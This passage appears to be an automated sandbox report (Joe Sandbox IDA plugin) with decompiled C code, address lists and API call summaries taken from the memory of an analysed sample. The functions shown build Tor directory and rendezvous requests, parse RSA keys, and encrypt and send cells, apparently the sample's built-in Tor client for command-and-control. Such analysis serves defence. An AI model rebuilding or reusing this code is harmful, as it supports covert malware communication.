													_t77 = E003A48F6(_t87, 0, _v16, 1);
													_t123 = _t123 + 0xc;
													continue;
												} else {
													goto L21;
												}
											}
										}
										goto L27;
									}
									goto L7;
								}
							}
						} else {
							_v12 = _v12 + 1;
							if(_v12 < 0x400) {
								continue;
							} else {
								goto L7;
							}
						}
						goto L27;
					}
					goto L7;
				}
				L27:
				 *0x3b8540(_v16);
				 *0x3b8540(_v8);
				return _t111;
			}































    0x003a4bee
    0x003a4bf5
    0x003a4bff
    0x003a4c02
    0x003a4c06
    0x003a4c09
    0x003a4c09
    0x003a4c0b
    0x003a4c0c
    0x003a4c1b
    0x003a4c20
    0x003a4c25
    0x003a4c71
    0x003a4c71
    0x003a4c27
    0x003a4c2d
    0x003a4c38
    0x003a4c3b
    0x003a4c3f
    0x003a4c45
    0x003a4c4d
    0x003a4c52
    0x003a4c57
    0x00000000
    0x00000000
    0x003a4c67
    0x003a4c86
    0x00000000
    0x003a4c88
    0x003a4c96
    0x003a4d42
    0x003a4d51
    0x00000000
    0x003a4d57
    0x003a4d57
    0x003a4d70
    0x003a4d7d
    0x00000000
    0x003a4d83
    0x003a4d86
    0x003a4d96
    0x00000000
    0x003a4d9c
    0x003a4d9f
    0x00000000
    0x003a4d9f
    0x003a4d96
    0x003a4d7d
    0x003a4c9c
    0x003a4ca5
    0x003a4cb3
    0x003a4cb6
    0x003a4cb9
    0x003a4cbc
    0x003a4cc3
    0x003a4ccc
    0x003a4ccf
    0x003a4cd4
    0x003a4d18
    0x003a4cdd
    0x003a4ce2
    0x003a4ce5
    0x003a4ce5
    0x003a4cef
    0x003a4cf7
    0x003a4d2e
    0x003a4d37
    0x003a4d3b
    0x003a4da3
    0x003a4da5
    0x003a4cf9
    0x003a4cfb
    0x003a4d24
    0x00000000
    0x003a4cfd
    0x003a4cfd
    0x003a4d02
    0x003a4d10
    0x003a4d15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a4d02
    0x003a4cfb
    0x00000000
    0x003a4cf7
    0x00000000
    0x003a4d1c
    0x003a4c96
    0x003a4c69
    0x003a4c69
    0x003a4c6f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a4c6f
    0x00000000
    0x003a4c67
    0x00000000
    0x003a4c3f
    0x003a4da6
    0x003a4da9
    0x003a4db2
    0x003a4dc0

    APIs
      • Part of subcall function 003A463A: memset.MSVCRT ref: 003A46EE
      • Part of subcall function 003A463A: htons.WS2_32(?), ref: 003A4701
      • Part of subcall function 003A463A: htons.WS2_32( L:), ref: 003A472A
      • Part of subcall function 003A463A: memcpy.MSVCRT ref: 003A473E
      • Part of subcall function 003A463A: memset.MSVCRT ref: 003A481C
      • Part of subcall function 003A463A: memset.MSVCRT ref: 003A4845
      • Part of subcall function 003A463A: htons.WS2_32(?), ref: 003A487F
    • memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4939
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4955
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4964
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A497C
      • Part of subcall function 003A48F6: htons.WS2_32(?), ref: 003A4B37
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4B5F
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4B75
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4B9A
    • strstr.MSVCRT ref: 003A4C61
    • strstr.MSVCRT ref: 003A4C80
    • strstr.MSVCRT ref: 003A4C90
    • memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A238B: memcpy.MSVCRT ref: 003A2415
      • Part of subcall function 003A238B: memcpy.MSVCRT ref: 003A24E1
    • strstr.MSVCRT ref: 003A4D4B
    • strstr.MSVCRT ref: 003A4D68
    • sscanf.MSVCRT ref: 003A4D70
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A556B, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114string
    C-Code - Quality: 46%
    			E003A556B(void* __ecx, void* __edi, void* __eflags) {
				char* _v8;
				void* _v12;
				void* _v16;
				char _v20;
				intOrPtr _v32;
				char _v36;
				char _v860;
				void* __ebx;
				void* __esi;
				void* _t28;
				char _t31;
				void* _t33;
				char _t40;
				char* _t41;
				char* _t48;
				void* _t51;
				void* _t62;
				char* _t79;
				void* _t86;

				_t86 = __eflags;
				_t28 = E003A3E45(__ecx);
				E003A3E17( &_v860);
				_t31 = L003AF529(_t86, _t28);
				_pop(_t62);
				_v860 = _t31;
				_t87 = _t31;
				if(_t31 == 0) {
					L8:
					return 0;
				}
				_t33 = E003A4054( &_v860, _t87);
				_t88 = _t33;
				if(_t33 == 0 || E003A3EE9( &_v860, _t62, _t88) == 0) {
					L7:
					E003AFF10(_v860);
					goto L8;
				} else {
					_v20 = 0x10;
					__imp__#5( *_v860,  &_v36,  &_v20);
					_t40 =  *0x3b8538(0x200);
					_v12 = _t40;
					_t41 =  *0x3b8538(0x1000);
					_v8 = _t41;
					__imp__#12(_v32);
					_t12 =  &_v12; // 0x3a5e6d
					sprintf( *_t12, "GET /tor/micro/d/%s.z HTTP/1.0\r\nHost: %s\r\n\r\n", __edi + 0x2c, _t41);
					if(E003A4BDF( &_v860, _v12, _v8, 0) == 0) {
						L6:
						 *0x3b8540(_v8);
						 *0x3b8540(_v12);
						goto L7;
					}
					_t48 = strstr(_v8, "-----BEGIN RSA PUBLIC KEY-----");
					_v16 = _t48;
					if(_t48 == 0) {
						goto L6;
					}
					_t79 =  &((strstr( &(_t48[1]), "-----END RSA PUBLIC KEY-----"))[0x1c]);
					if(_t79 != 0) {
						_t51 =  *0x3b8538(0x1000);
						 *(__edi + 0x6c) = _t51;
						memset(_t51, 0, 0x1000);
						memcpy( *(__edi + 0x6c), _v16, _t79 - _v16);
						 *0x3b8540(_v8);
						 *0x3b8540(_v12);
						E003AFF10(_v860);
						__eflags = 1;
						return 1;
					}
					goto L6;
				}
			}






















    0x003a556b
    0x003a5576
    0x003a5583
    0x003a5589
    0x003a558e
    0x003a558f
    0x003a5595
    0x003a5597
    0x003a567c
    0x00000000
    0x003a567c
    0x003a55a3
    0x003a55a8
    0x003a55aa
    0x003a5671
    0x003a5677
    0x00000000
    0x003a55bf
    0x003a55cd
    0x003a55d6
    0x003a55e1
    0x003a55ee
    0x003a55f1
    0x003a55fb
    0x003a55fe
    0x003a560e
    0x003a5611
    0x003a5630
    0x003a565d
    0x003a5660
    0x003a566a
    0x00000000
    0x003a5670
    0x003a5640
    0x003a5644
    0x003a5649
    0x00000000
    0x00000000
    0x003a5656
    0x003a565b
    0x003a5681
    0x003a568c
    0x003a568f
    0x003a56a1
    0x003a56ac
    0x003a56b6
    0x003a56c3
    0x003a56ca
    0x00000000
    0x003a56ca
    0x00000000
    0x003a565b

    APIs
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A40B3
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4122
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4165
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A4054: htonl.WS2_32(00000000), ref: 003A41C5
      • Part of subcall function 003A4054: getpeername.WS2_32(?,?,?), ref: 003A41EA
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A4226
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4233
    • getpeername.WS2_32(?,?,?), ref: 003A55D6
    • inet_ntoa.WS2_32(?), ref: 003A55FE
    • sprintf.MSVCRT ref: 003A5611
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C61
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C80
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C90
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D4B
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D68
      • Part of subcall function 003A4BDF: sscanf.MSVCRT ref: 003A4D70
    • strstr.MSVCRT ref: 003A5640
    • strstr.MSVCRT ref: 003A5652
      • Part of subcall function 003AFF10: closesocket.WS2_32(?), ref: 003AFF12
    • memset.MSVCRT ref: 003A568F
    • memcpy.MSVCRT ref: 003A56A1
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F19
      • Part of subcall function 003A3EE9: htons.WS2_32(00000000), ref: 003A3F31
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3EE9: htons.WS2_32(?), ref: 003A3FB2
    Strings
    • m^:, xrefs: 003A560E
    • -----END RSA PUBLIC KEY-----, xrefs: 003A564C
    • GET /tor/micro/d/%s.z HTTP/1.0Host: %s, xrefs: 003A5609
    • -----BEGIN RSA PUBLIC KEY-----, xrefs: 003A5638
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A463A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 234network
    C-Code - Quality: 32%
    			E003A463A(intOrPtr* __ebx, void* _a4, void* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				void _v56;
				void _v172;
				intOrPtr _t99;
				void* _t103;
				void* _t104;
				signed int _t106;
				signed int _t107;
				void* _t125;
				signed int _t128;
				void* _t129;
				signed int _t132;
				signed int _t133;
				void* _t140;
				void* _t144;
				intOrPtr* _t148;
				signed int _t156;
				signed int* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t178;
				void* _t185;
				intOrPtr _t192;
				void* _t194;
				void* _t195;
				int _t196;
				void* _t198;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;

				_t148 = __ebx;
				_t178 =  *0x3b8538(0x200);
				_v16 = _t178;
				_v8 =  *0x3b8538(0x200);
				_v24 = _v24 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_t99 = _a12 / 0x1f2 + 1;
				_v36 = _t99;
				if(_t99 == 0) {
					L24:
					 *0x3b8540(_t178);
					 *0x3b8540(_v8);
					_t103 = 1;
				} else {
					_t104 = _a8;
					_v28 = 0x1f2;
					_v28 = _v28 - _t104;
					_v20 = _t104;
					do {
						_t19 =  &_a4; // 0x3a4c20
						_t192 =  *_t19;
						if(_t192 == 0) {
							L9:
							memset(_t178, 0, 0x1fd);
							 *_t178 = 2;
							_t106 =  *(_t148 + 0x138) & 0x0000ffff;
							_t201 = _t200 + 0xc;
							__imp__#9(_t106);
							 *(_t178 + 3) = _t106;
							_t107 = _a12;
							if(_v20 + _v28 >= _t107) {
								_t107 = _t107 - _v24;
								_v12 = _t107;
							} else {
								_v12 = 0x1f2;
							}
							_t38 =  &_v12; // 0x3a4c20
							__imp__#9( *_t38);
							 *(_t178 + 9) = _t107;
							_t42 = _t178 + 0xb; // 0xb
							memcpy(_t42, _v20, _v12);
							_t202 = _t201 + 0xc;
							_push(0x1fd);
							_push(_t178);
							if(_a4 == 0) {
								 *0x3b899c(_t148 + 8);
								_t194 = _t148 + 8;
							} else {
								 *0x3b899c(_a4);
								_t194 = _a4;
							}
							_t156 = 0x1d;
							memcpy( &_v172, _t194, _t156 << 2);
							_t195 =  *0x3b8538(0x14);
							_v12 = _t195;
							 *0x3b8ab0( &_v172, _t195);
							memcpy( &_v56, _t195, 0 << 2);
							_t204 = _t202 + 0x18;
							 *0x3b8540(_v12, 5);
							_t185 = _a4;
							_t118 = _v16;
							 *((intOrPtr*)(_v16 + 5)) = _v56;
							if(_t185 == 0) {
								_t196 = 0x200;
								memset(_v8, 0, 0x200);
								_t125 = E003A3BB7(_t148 + 0xf0, _v16, 0x1fd, _v8 + 3, _t148 + 0x110, _t148 + 0x120);
								_t205 = _t204 + 0x24;
								if(_t125 == 0) {
									goto L26;
								} else {
									goto L20;
								}
							} else {
								_t59 = _t185 + 0x118; // 0x118
								_t60 = _t185 + 0x108; // 0x108
								_t140 = E003A3BB7(_t185 + 0xe8, _t118, 0x1fd, _v8, _t60, _t59);
								_t206 = _t204 + 0x18;
								if(_t140 == 0) {
									L26:
									_t178 = _v16;
									goto L27;
								} else {
									_t144 = E003A3BB7(_t148 + 0xf0, _v8, 0x1fd, _v16, _t148 + 0x110, _t148 + 0x120);
									_t207 = _t206 + 0x18;
									if(_t144 == 0) {
										goto L26;
									} else {
										_t198 = _v8;
										memset(_t198, 0, 0x200);
										_t170 = 0x7f;
										memcpy(_t198 + 3, _v16, _t170 << 2);
										_t205 = _t207 + 0x18;
										asm("movsb");
										_t185 = _a4;
										_t196 = 0x200;
										L20:
										_t128 =  *(_t148 + 4) & 0x0000ffff;
										__imp__#9(_t128);
										_t163 = _v8;
										 *_t163 = _t128;
										_t163[0] = 3;
										_t129 = E003AFD0B( *_t148, _t163, _t196);
										_t200 = _t205 + 0xc;
										if(_t129 != _t196) {
											goto L26;
										} else {
											goto L21;
										}
									}
								}
							}
						} else {
							_t132 =  *(_t192 + 0x134);
							if(_t132 < 0x3e8) {
								L6:
								_t133 =  *(_t192 + 0x134);
								if(_t133 < 0x1f4) {
									goto L9;
								} else {
									_t164 = 0x32;
									if(_t133 % _t164 != 0 || E003A4573(_t148, _t192) != 0) {
										goto L9;
									} else {
										goto L27;
									}
								}
							} else {
								_t166 = 0x64;
								if(_t132 % _t166 != 0 || E003A4573(_t148, _t192) != 0) {
									goto L6;
								} else {
									L27:
									 *0x3b8540(_t178);
									 *0x3b8540(_v8);
									_t103 = 0;
								}
							}
						}
						goto L25;
						L21:
						_v24 = _v24 + 0x1f2;
						_v20 = _v20 + 0x1f2;
						if(_t185 != 0) {
							 *((intOrPtr*)(_t185 + 0x134)) =  *((intOrPtr*)(_t185 + 0x134)) + 1;
						}
						_v32 = _v32 + 1;
						_t178 = _v16;
					} while (_v32 < _v36);
					goto L24;
				}
				L25:
				return _t103;
			}













































    0x003a463a
    0x003a4651
    0x003a4654
    0x003a465f
    0x003a466e
    0x003a4672
    0x003a4676
    0x003a4677
    0x003a467a
    0x003a48c6
    0x003a48c7
    0x003a48d0
    0x003a48d8
    0x003a4680
    0x003a4680
    0x003a4683
    0x003a4686
    0x003a4689
    0x003a468c
    0x003a468c
    0x003a468c
    0x003a4691
    0x003a46e5
    0x003a46ee
    0x003a46f3
    0x003a46f6
    0x003a46fd
    0x003a4701
    0x003a470d
    0x003a4711
    0x003a4716
    0x003a4721
    0x003a4724
    0x003a4718
    0x003a4718
    0x003a4718
    0x003a4727
    0x003a472a
    0x003a4733
    0x003a473a
    0x003a473e
    0x003a4743
    0x003a474a
    0x003a474b
    0x003a474c
    0x003a4760
    0x003a4766
    0x003a474e
    0x003a4751
    0x003a4757
    0x003a4757
    0x003a476b
    0x003a4774
    0x003a477c
    0x003a4787
    0x003a478a
    0x003a4799
    0x003a4799
    0x003a479b
    0x003a47a1
    0x003a47a4
    0x003a47ab
    0x003a47b0
    0x003a483a
    0x003a4845
    0x003a486e
    0x003a4873
    0x003a4878
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a47b6
    0x003a47b6
    0x003a47bd
    0x003a47d5
    0x003a47da
    0x003a47df
    0x003a48df
    0x003a48df
    0x00000000
    0x003a47e5
    0x003a4801
    0x003a4806
    0x003a480b
    0x00000000
    0x003a4811
    0x003a4811
    0x003a481c
    0x003a482c
    0x003a482d
    0x003a482d
    0x003a482f
    0x003a4830
    0x003a4833
    0x003a487a
    0x003a487a
    0x003a487f
    0x003a4885
    0x003a488a
    0x003a488d
    0x003a4893
    0x003a4898
    0x003a489d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a489d
    0x003a480b
    0x003a47df
    0x003a4693
    0x003a4693
    0x003a469e
    0x003a46bc
    0x003a46bc
    0x003a46c7
    0x00000000
    0x003a46c9
    0x003a46cd
    0x003a46d2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a46d2
    0x003a46a0
    0x003a46a4
    0x003a46a9
    0x00000000
    0x003a48e2
    0x003a48e2
    0x003a48e3
    0x003a48ec
    0x003a48f2
    0x003a48f2
    0x003a46a9
    0x003a469e
    0x00000000
    0x003a489f
    0x003a48a4
    0x003a48a7
    0x003a48ac
    0x003a48ae
    0x003a48ae
    0x003a48b4
    0x003a48ba
    0x003a48bd
    0x00000000
    0x003a468c
    0x003a48d9
    0x003a48de

    APIs
    • memset.MSVCRT ref: 003A46EE
    • htons.WS2_32(?), ref: 003A4701
    • htons.WS2_32( L:), ref: 003A472A
    • memcpy.MSVCRT ref: 003A473E
    • memset.MSVCRT ref: 003A481C
    • memset.MSVCRT ref: 003A4845
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A487F
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A5C47, Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 401network
    C-Code - Quality: 43%
    			E003A5C47(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v504;
				char _v512;
				char _v532;
				int _v1364;
				void* _v2164;
				char _v2180;
				char _v2284;
				intOrPtr _v2316;
				void _v2400;
				void _v2420;
				char _v2424;
				char _v2440;
				char _v2456;
				intOrPtr _v2460;
				void _v2488;
				char _v2496;
				void _v2508;
				intOrPtr _v2516;
				char _v2528;
				char _v2532;
				intOrPtr _v2540;
				char _v2544;
				void _v2552;
				void* _v2556;
				signed int _v2560;
				intOrPtr _v2564;
				char* _v2568;
				void* _v2572;
				char* _v2576;
				intOrPtr _v2580;
				void* _v2584;
				signed int _v2588;
				void* _v2592;
				void* _v2596;
				char _v2600;
				intOrPtr _v2604;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t129;
				signed int _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t135;
				char* _t136;
				void* _t150;
				void* _t156;
				char _t160;
				void* _t161;
				intOrPtr* _t167;
				int _t171;
				int _t175;
				signed int _t176;
				int _t188;
				int _t189;
				int _t194;
				int _t195;
				void* _t197;
				intOrPtr _t203;
				int _t207;
				int _t213;
				int _t222;
				int _t226;
				int _t232;
				int _t234;
				void* _t245;
				void* _t249;
				void* _t251;
				void* _t257;
				void* _t271;
				signed int _t272;
				void* _t278;
				void* _t279;
				void* _t281;
				signed int _t285;
				signed int _t288;
				int _t310;
				signed int _t312;
				void* _t313;
				intOrPtr _t318;
				int _t323;
				char* _t337;
				void* _t338;
				intOrPtr _t342;
				intOrPtr* _t347;
				int _t349;
				int _t350;
				int _t353;
				intOrPtr* _t358;
				signed int _t359;
				void* _t362;
				void* _t363;
				void* _t364;
				void* _t365;
				void* _t366;

				_t129 =  *0x3b8538(0x470, _t313, _t338, _t245);
				_v2572 = _t129;
				memset(_t129, 0, 0x470);
				_t362 = (_t359 & 0xfffffff8) - 0xa14 + 0xc;
				_v2552 =  *0x3b8538(0x200);
				_v2600 = 0x10000;
				_t132 =  *0x3b8538();
				_v2560 = _t132;
				_t133 =  *0x3b8538(0x1000);
				_v2580 = _t133;
				_t134 =  *0x3b8538(0x1000);
				_v2540 = _t134;
				_t135 =  *0x3b8538(0x28);
				_v2556 = _t135;
				_t136 =  *0x3b8538();
				_t257 = 0x80;
				_v2568 = _t136;
				if(E003A50D5(_a4,  &_v2440, E003AE937(_t257) & 1) == 0 || E003A39C0( &_v2528,  &_v2440) != 0x14) {
					L33:
					 *0x3b8540(_v2556);
					 *0x3b8540(_v2568);
					 *0x3b8540(_v2560);
					 *0x3b8540(_v2552);
					 *0x3b8540(_v2540);
					 *0x3b8540(_v2580);
					 *0x3b8540(_v2572);
					_t150 = 0;
				} else {
					_t156 = E003A51F8( &_v2284,  &_v2528);
					_t379 = _t156;
					if(_t156 == 0) {
						goto L33;
					} else {
						E003A3E17( &_v2164);
						_t160 = L003AF529(_t379,  &_v2284);
						_pop(_t271);
						_v2164 = _t160;
						_t380 = _t160;
						if(_t160 == 0) {
							goto L33;
						} else {
							_t161 = E003A4054( &_v2164, _t380);
							_t381 = _t161;
							if(_t161 == 0 || E003A3EE9( &_v2164, _t271, _t381) == 0) {
								_t342 = _v2164;
								goto L8;
							} else {
								_t167 = _v2164;
								_v2532 = 0x10;
								__imp__#5( *_t167,  &_v2508,  &_v2532);
								__imp__#12(_v2516);
								sprintf(_v2568, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\n\r\n",  &_v2456, _t167);
								_t171 = E003A4BDF( &_v2180, _v2568, _v2576, 0);
								_t342 = _v2180;
								_t363 = _t362 + 0x20;
								__eflags = _t171;
								if(_t171 != 0) {
									E003AFF10(_t342);
									_t175 = E003A528D( &_v532,  &_v2560, _v2576);
									_t364 = _t363 + 0xc;
									__eflags = _t175;
									if(_t175 == 0) {
										goto L33;
									} else {
										_t176 = E003AE937(_t271);
										_t272 = 8;
										_t310 = _t176 % _v2560 << 5;
										__eflags = _t310;
										memcpy( &_v2488, _t364 + _t310 + 0x820, _t272 << 2);
										_t365 = _t364 + 0xc;
										_t318 =  *0x3b8ac0; // 0x0
										do {
											_t312 = E003AE937(0) %  *0x3b8ac4;
											__eflags =  *((intOrPtr*)(_t312 * 0x74 + _t318 + 0x70)) - 1;
										} while (__eflags != 0);
										_push(0x1d);
										memcpy( &_v2420, _t312 * 0x74 + _t318, 0 << 2);
										_t366 = _t365 + 0xc;
										__eflags = E003A556B(0,  &_v2420, __eflags);
										if(__eflags == 0) {
											L30:
											_t323 = _v2560;
											__eflags = _t323;
											if(_t323 > 0) {
												_t347 =  &_v504;
												do {
													 *0x3b8540( *((intOrPtr*)(_t347 - 4)));
													 *0x3b8540( *_t347);
													_t347 = _t347 + 0x20;
													_t323 = _t323 - 1;
													__eflags = _t323;
												} while (_t323 != 0);
											}
											goto L33;
										} else {
											_t188 = L003AF529(__eflags,  &_v2420);
											_t324 = _v2588;
											_pop(_t278);
											 *_v2588 = _t188;
											__eflags = _t188;
											if(__eflags == 0) {
												goto L30;
											} else {
												_t189 = E003A4054(_t324, __eflags);
												__eflags = _t189;
												if(_t189 == 0) {
													L29:
													E003AFF10( *_t324);
													goto L30;
												} else {
													_t349 = 0;
													__eflags = 0;
													do {
														 *((char*)(_t366 + _t349 + 0x44)) = E003AE8E0();
														_t349 = _t349 + 1;
														__eflags = _t349 - 0x14;
													} while (__eflags < 0);
													_t194 = E003A56CF(_t324, _t278, __eflags,  &_v2544);
													_pop(_t279);
													__eflags = _t194;
													if(__eflags == 0) {
														goto L29;
													} else {
														_t195 = E003AF29F(_t279, __eflags, _v2572, _v2584);
														_pop(_t281);
														__eflags = _t195;
														if(_t195 == 0) {
															goto L29;
														} else {
															_t249 = _v2556;
															_t350 = E003A5853(_t281, _v2460, _t249);
															_v2552 = _t350;
															__eflags = _t350;
															if(__eflags == 0) {
																goto L29;
															} else {
																_t197 =  *0x3b8538(_t350);
																_v2592 = _t197;
																memcpy(_t197, _t249, _t350);
																E003A3B5C(_v2592, _t350,  &_v2508);
																_t285 = 5;
																memcpy(_v2596,  &_v2508, _t285 << 2);
																 *_t249 = 3;
																_t203 = E003A3B23(__eflags) + 0x96;
																__imp__#8(_t203);
																 *((intOrPtr*)(_t249 + 2)) = _t203;
																_t207 = E003AEA68( &_v2424,  &_v2568,  &_v2584);
																__eflags = _t207;
																if(_t207 == 0) {
																	L28:
																	 *0x3b8540(_v2596);
																	_t324 = _v2592;
																	goto L29;
																} else {
																	 *((intOrPtr*)(_t249 + 6)) = _v2568;
																	 *((short*)(_t249 + 0xa)) = _v2584;
																	_t288 = 5;
																	memcpy(_t249 + 0xc,  &_v2400, _t288 << 2);
																	_t213 = E003A5853(0, _v2316, _t249 + 0x22);
																	_t353 = _t213;
																	_v2568 = _t353;
																	__eflags = _t353;
																	if(_t353 == 0) {
																		goto L28;
																	} else {
																		__imp__#9(_t353);
																		 *(_t249 + 0x20) = _t213;
																		_push(5);
																		_v2588 = _v2588 & 0x00000000;
																		_t85 = _t249 + _t353 + 0x22; // 0x22
																		_push(0x20);
																		_t89 = memcpy(_t85,  &_v2552, 0 << 2) + 0x36; // 0x36
																		memcpy(_t89, _v2592, 0 << 2);
																		_t222 = E003A588E(_t249, _v2572 + 0xb6, _v2600, _v2560, _v2604 + 0x14,  &_v2588);
																		__eflags = _t222;
																		if(_t222 == 0) {
																			goto L28;
																		} else {
																			E003A3E17( &_v1364);
																			_t226 = L003AF529(__eflags,  &_v2496);
																			_v1364 = _t226;
																			__eflags = _t226;
																			if(__eflags == 0) {
																				goto L28;
																			} else {
																				__eflags = E003A4054( &_v1364, __eflags);
																				if(__eflags == 0) {
																					L27:
																					E003AFF10(_v1364);
																					goto L28;
																				} else {
																					_t232 = E003A5949( &_v1364, __eflags, _v2604, _v2588 + 0x14);
																					__eflags = _t232;
																					if(_t232 == 0) {
																						goto L27;
																					} else {
																						_t251 = _v2596;
																						_t234 = E003A5AAA(_t251, _v2580, _t251 + 0x338);
																						__eflags = _t234;
																						if(_t234 != 0) {
																							E003AFF10(_v1364);
																							 *0x3b8540(_v2600);
																							_t337 = _v2568;
																							__eflags = _t337;
																							if(_t337 > 0) {
																								_t358 =  &_v512;
																								do {
																									 *0x3b8540( *((intOrPtr*)(_t358 - 4)));
																									 *0x3b8540( *_t358);
																									_t358 = _t358 + 0x20;
																									_t337 = _t337 - 1;
																									__eflags = _t337;
																								} while (_t337 != 0);
																							}
																							 *0x3b8540(_v2580);
																							 *0x3b8540(_v2592);
																							 *0x3b8540(_v2584);
																							 *0x3b8540(_v2576);
																							 *0x3b8540(_v2564);
																							 *0x3b8540(_v2604);
																							_t150 = _t251;
																						} else {
																							goto L27;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									L8:
									E003AFF10(_t342);
									goto L33;
								}
							}
						}
					}
				}
				return _t150;
			}


































































































    0x003a5c5c
    0x003a5c67
    0x003a5c6b
    0x003a5c70
    0x003a5c7e
    0x003a5c82
    0x003a5c89
    0x003a5c96
    0x003a5c9a
    0x003a5ca2
    0x003a5ca6
    0x003a5caf
    0x003a5cb3
    0x003a5cbf
    0x003a5cc3
    0x003a5cc9
    0x003a5cca
    0x003a5ced
    0x003a60b5
    0x003a60b9
    0x003a60c4
    0x003a60cf
    0x003a60da
    0x003a60e5
    0x003a60f0
    0x003a60fb
    0x003a6101
    0x003a5d10
    0x003a5d1d
    0x003a5d24
    0x003a5d26
    0x00000000
    0x003a5d2c
    0x003a5d33
    0x003a5d40
    0x003a5d45
    0x003a5d46
    0x003a5d4d
    0x003a5d4f
    0x00000000
    0x003a5d55
    0x003a5d5c
    0x003a5d61
    0x003a5d63
    0x003a5d70
    0x00000000
    0x003a5d79
    0x003a5d83
    0x003a5d8a
    0x003a5d94
    0x003a5d9e
    0x003a5db6
    0x003a5dce
    0x003a5dd3
    0x003a5dda
    0x003a5ddd
    0x003a5ddf
    0x003a5deb
    0x003a5e01
